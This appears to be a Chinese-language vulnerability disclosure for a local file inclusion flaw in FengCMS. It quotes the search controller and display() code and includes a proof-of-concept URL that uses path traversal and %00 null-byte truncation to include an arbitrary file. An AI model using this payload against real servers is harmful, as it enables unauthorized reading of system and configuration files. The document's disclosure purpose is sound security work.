### 简要描述:

LFI

### 详细说明:

条件:PHP<5.3.4

/app/controller/searchController.php:

```php
public function index(){
    if(!empty($_POST)){
        if(URL_TYPE==1){
            echo '<meta http-equiv="refresh" content="0;url='.(($_POST['project'])?'?controller=search&project='.$_POST['project'].'&tags='.$_POST['tags']:'/tags/'.$_POST['tags'].'.html').'">';
        }else{
            echo '<meta http-equiv="refresh" content="0;url=?controller=search'.(($_POST['project'])?'&project='.$_POST['project'].'&tags='.$_POST['tags']:'&tags='.$_POST['tags']).'.html">';
        }
    }else{
        if ($_GET['tags'] != '') {
            $encode = mb_detect_encoding ( $_GET['tags'], array ("ASCII", "UTF-8", "GB2312", "GBK", "BIG5" ) );
            if ($encode != "UTF-8") {
                $_GET['tags'] = iconv ( "gb2312", "UTF-8", $_GET['tags'] );
            }
        }
        if($_GET['tags']){
            if($_GET['project']!=""){
                return $this->display($_GET['project'].'_search.html');
            }else{
                return $this->display('search.html');
            }
        }else{
            echo '<script type="text/javascript">alert("请输入关键词!");history.go(-1)</script>';
        }
    }
}
}
```

上面的代码中,当 POST 为空且 $_GET['tags'] 不为空时,可控的 $_GET['project'] 会被直接拼接进模板文件名并传给 display(),接着看 display():

/system/core/controller.php:27行

```php
public function display($path,$data=""){
    if(!isset($path)){
        return throwexce(sprintf('Template file does not exist!'));
    }else{
        $tpl= new template();
        if(!empty($data)){
            extract($data,EXTR_OVERWRITE);
        }
        include template::tpl($path);
    }
}
```

$path 经 template::tpl($path) 后直接被 include,没有对路径做任何校验;由于程序自带 stripslashes(前面已提到),在 PHP<5.3.4 下利用 %00 截断即可去掉后面拼接的 `_search.html` 后缀,于是 LFI 有了。

poc:

```
localhost/fengcms/index.php?controller=search&operate=index&tags=1&project=../../../../../../../windows/win.ini%00
```

[![QQ20140628-3.png](https://images.seebug.org/upload/201406/28165842775e1b3c4b70ba59995bdcfacd49ec17.png)](https://images.seebug.org/upload/201406/28165842775e1b3c4b70ba59995bdcfacd49ec17.png)

### 漏洞证明:

```
localhost/fengcms/index.php?controller=search&operate=index&tags=1&project=../../../../../../../windows/win.ini%00
```

[![QQ20140628-3.png](https://images.seebug.org/upload/201406/28165842775e1b3c4b70ba59995bdcfacd49ec17.png)](https://images.seebug.org/upload/201406/28165842775e1b3c4b70ba59995bdcfacd49ec17.png)